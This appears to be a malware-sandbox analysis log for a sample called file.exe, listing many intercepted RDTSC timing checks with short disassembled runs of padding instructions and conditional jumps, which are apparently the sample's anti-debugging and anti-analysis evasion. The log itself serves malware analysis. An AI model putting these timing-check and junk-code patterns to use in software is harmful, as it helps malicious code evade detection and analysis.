                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54978E second address: 5497A3 instructions: 0x00000000 rdtsc 0x00000002 js 00007F95D47CFB26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f je 00007F95D47CFB26h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5497A3 second address: 5497C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D5269639h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5497C6 second address: 5497D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D47CFB2Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 549DD0 second address: 549DE8 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F95D5269626h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jbe 00007F95D526962Eh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54AEBF second address: 54AEC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54AEC5 second address: 54AED2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5540E4 second address: 5540E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5540E9 second address: 5540EE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5540EE second address: 5540FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5540FA second address: 554119 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F95D5269639h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 554119 second address: 55413D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F95D47CFB2Ch 0x00000009 popad 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jmp 00007F95D47CFB2Dh 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55413D second address: 55415D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F95D5269639h 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5542D2 second address: 5542D7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55445D second address: 554467 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5545C3 second address: 5545C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5545C8 second address: 5545D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F95D5269626h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5545D2 second address: 5545D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 556118 second address: 55611C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55611C second address: 556120 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 556120 second address: 556126 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 556126 second address: 55614D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F95D47CFB39h 0x0000000d jnp 00007F95D47CFB26h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55614D second address: 556153 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55DE4F second address: 55DE60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D47CFB2Bh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55DE60 second address: 55DE65 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55DE65 second address: 55DE8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 jmp 00007F95D47CFB2Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F95D47CFB32h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55DE8E second address: 55DE98 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55C548 second address: 55C559 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F95D47CFB2Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55C69D second address: 55C6A7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55C6A7 second address: 55C6B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F95D47CFB26h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55CAEA second address: 55CB0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jnc 00007F95D5269632h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jc 00007F95D526962Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55CB0E second address: 55CB1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pushad 0x00000006 popad 0x00000007 jnp 00007F95D47CFB26h 0x0000000d pop ebx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55CC9D second address: 55CCA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55CDC2 second address: 55CE02 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F95D47CFB2Ch 0x00000008 jmp 00007F95D47CFB39h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jne 00007F95D47CFB35h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55D548 second address: 55D54C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55D54C second address: 55D558 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55D558 second address: 55D55C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55D55C second address: 55D560 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55BBBC second address: 55BBC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5652BE second address: 5652C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5652C4 second address: 5652C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5652C8 second address: 5652E2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F95D47CFB30h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5652E2 second address: 5652E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 564D28 second address: 564D2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 564D2C second address: 564D32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 564D32 second address: 564D3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 564D3C second address: 564D46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F95D5269626h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 564D46 second address: 564D50 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F95D47CFB26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 564D50 second address: 564D77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F95D5269628h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jno 00007F95D526962Eh 0x00000015 jo 00007F95D5269628h 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 564D77 second address: 564D83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jnl 00007F95D47CFB26h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 564D83 second address: 564D8D instructions: 0x00000000 rdtsc 0x00000002 jl 00007F95D5269626h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 572C04 second address: 572C12 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 572C12 second address: 572C16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 574B88 second address: 574BC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F95D47CFB38h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop esi 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F95D47CFB38h 0x00000015 jl 00007F95D47CFB26h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 574BC9 second address: 574BDC instructions: 0x00000000 rdtsc 0x00000002 jo 00007F95D5269626h 0x00000008 jnp 00007F95D5269626h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5746C9 second address: 5746CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 576237 second address: 57623D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57623D second address: 576243 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 576243 second address: 576248 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 578CC5 second address: 578CCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 578CCB second address: 578CCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 578754 second address: 578764 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D47CFB2Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5788A1 second address: 5788D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D5269635h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F95D526962Fh 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5788D1 second address: 5788D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5788D5 second address: 5788DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5788DB second address: 5788E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57F906 second address: 57F90A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57F90A second address: 57F93A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007F95D47CFB26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F95D47CFB36h 0x00000012 jmp 00007F95D47CFB2Bh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5877BF second address: 5877C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 587646 second address: 58764F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59416D second address: 594180 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D526962Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 592ECC second address: 592ED2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 593486 second address: 59348C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59348C second address: 5934B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D47CFB38h 0x00000007 jmp 00007F95D47CFB2Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 597CAA second address: 597CD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F95D5269626h 0x0000000a pop esi 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 pop eax 0x00000012 jg 00007F95D5269626h 0x00000018 popad 0x00000019 pushad 0x0000001a jo 00007F95D5269626h 0x00000020 pushad 0x00000021 popad 0x00000022 push ebx 0x00000023 pop ebx 0x00000024 popad 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 597CD3 second address: 597CDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F95D47CFB26h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 597867 second address: 59787D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D5269632h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59787D second address: 597885 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 597885 second address: 5978A3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jnc 00007F95D5269626h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 jp 00007F95D5269626h 0x00000017 pop edi 0x00000018 pushad 0x00000019 push eax 0x0000001a pop eax 0x0000001b push esi 0x0000001c pop esi 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59B724 second address: 59B72A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59B72A second address: 59B733 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59B733 second address: 59B74D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jns 00007F95D47CFB26h 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F95D47CFB2Ah 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A22F8 second address: 5A22FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A46C3 second address: 5A4730 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jo 00007F95D47CFB35h 0x0000000b jmp 00007F95D47CFB2Fh 0x00000010 jmp 00007F95D47CFB2Ch 0x00000015 popad 0x00000016 pushad 0x00000017 pushad 0x00000018 jmp 00007F95D47CFB37h 0x0000001d jmp 00007F95D47CFB2Eh 0x00000022 jnl 00007F95D47CFB26h 0x00000028 popad 0x00000029 jmp 00007F95D47CFB34h 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 popad 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B59AF second address: 5B59B4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B59B4 second address: 5B59D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F95D47CFB35h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B59D2 second address: 5B59D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B56B8 second address: 5B56C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007F95D47CFB26h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B56C7 second address: 5B56CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B56CB second address: 5B56E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D47CFB2Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B56E1 second address: 5B56E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C4F5E second address: 5C4F6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 jo 00007F95D47CFB28h 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C585C second address: 5C5860 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C5B18 second address: 5C5B20 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C5B20 second address: 5C5B2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F95D5269626h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C5C9E second address: 5C5CA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C8AB8 second address: 5C8AC9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 ja 00007F95D526962Eh 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C8B4E second address: 5C8B53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C8E4E second address: 5C8E6A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D5269631h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C8E6A second address: 5C8E71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
